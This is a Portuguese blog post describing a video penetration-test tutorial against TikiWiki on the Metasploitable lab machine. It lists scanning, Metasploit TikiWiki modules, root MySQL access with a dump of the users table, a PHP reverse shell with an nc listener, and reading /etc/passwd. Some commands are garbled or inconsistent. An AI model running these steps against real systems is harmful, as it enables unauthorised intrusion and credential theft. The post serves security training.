______
/ Sinopse \________________________
Vou mostrar nessa vídeo aula um ataque ao serviço Tikiwiki, que é o serviço de gerenciamento de conteúdo através da web.
Primeiramente rodei um postscan (Nmap) em uma determinado host, logo encontrando a porta 80 aberta(Porta de serviço web), testei em um navegador para testa se o serviço realmente estava funcionando, logo apos usei o Dirbuster para listar os diretórios do serviço web. Testei alguns ate encontrar o campo de login.
Com essa informações em mãos, parti para o ataque, mostrei a auditoria com o metasploit e manual, como vocês vão pode observar, podemos obter o mesmo resultado.
__________________
/ Informações adicionais \___________
O serviço Tikiwiki estava rodando em um sistema operacional Ubuntu 8.04 modificado pela equipe do Metasploit e chamado de Metasploitable.
A equipe do Metasploit procurei colocar o máximo de vulnerabilidades possíveis, e uma ótima distro para teste de penetração.
As vulnerabilidades: http://www.metasploit.com/documents/express/Metasploitable.txt
Baixar o ISO(torrent): http://www.metasploit.com/documents/express/Metasploitable.zip.torrent
________
/ Comandos \________________________
nmap 192.168.1.4
java -jar DirBuster-0.12.jar -u http://192.168.1.4
msfconsole
search tikiwiki
use use admin/tikiwiki/tikidblib
set RHOST 192.168.1.4
exploit
tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p root
show databases;
use tikiwiki195;
show tables;
select * from users_users;
http://192.168.1.4/tikiwiki/backups/shell-reverso.php
nc -lvp 8080
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
set lhost 192.168.1.5
set rhost 192.168.1.5
show options
exploit
ls
whoami
cat /etc/passwd
___________
/ Sobre o Video \____________________
Tamanho: 40.08 Mb
Formato: AVI
Duração: 12:54
Musica: Clint Mansell - Requiem for a Dream
Autor: Fabiano Matias
Baixar: http://www.4shared.com/file/Z6nHD7AX/tikiwiki.html
On line: http://www.vimeo.com/16375616
_________
/ Referencias \______________________
http://www.backtrack-linux.org/forums/backtrack-videos/
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
http://www.metasploit.com/documents/express/Metasploitable.txt
http://www.metasploit.com/
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
http://nmap.org
http://pt.wikipedia.org/wiki/TikiWiki
http://www.exploit-db.com/exploits/2701/
http://pentestmonkey.net/tools/php-reverse-shell/
http://www.metasploit.com/documents/express/Metasploitable.zip.torrent
http://www.osvdb.org/30172
http://www.securityfocus.com/bid/20858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5702
http://secunia.com/advisories/22678/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
http://www.osvdb.org/40478
http://www.securityfocus.com/bid/26006
Publicado nos parceiros do Blog:
http://www.darkside-forums.com.br/ipb/topic/446-vulnerabilidade-no-tikiwiki/
http://www.chmod.com.br/vb/showthread.php?10388-Vulnerabili**de-no-TikiWiki
http://www.re-b.net/home/viewtopic.php?f=41&t=325
Forum-underground no momento em manutenção
podrias poner el script de shell_reverse.php por favor?
ResponderExcluirmuchas gracias Bhior! :)
ResponderExcluir